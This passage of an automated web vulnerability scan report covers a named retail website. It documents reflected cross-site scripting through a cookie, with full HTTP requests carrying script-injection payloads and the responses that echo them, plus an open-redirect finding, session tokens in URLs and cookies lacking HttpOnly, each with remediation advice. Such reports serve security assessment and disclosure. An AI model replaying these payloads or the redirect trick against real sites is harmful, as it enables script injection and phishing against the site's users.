Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:04 GMT
Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:32 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gift-cards HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19751
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gift-cards/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gifts HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:45 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-reserve HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29291
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:31 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... ve Coffee Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Reserve Coffee Page" var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-reserve/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:35 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:17 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-via HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32239
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:29 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... eName="Starbucks VIA Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks VIA Page" var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-via/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tea HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26007
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:58 GMT
Connection: close
<head> <title>Tea at Starbucks Store</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> ...[SNIP]... ageName="Tazo Tea HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Tazo Tea HomePage" var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D" var s_prop4="" var s_prop5="" var s_prop6="/tea/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state= ...[SNIP]...
4. Session token in URL
There are 2 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack, because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 360
Content-Type: text/html
Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:30 GMT
Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750 ...[SNIP]...
6. Cookie without HttpOnly flag set
There are 11 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&Redir=">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&Redir=">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Location: /guestassist/shcontus.asp?error=noselection
Server: Microsoft-IIS/7.0
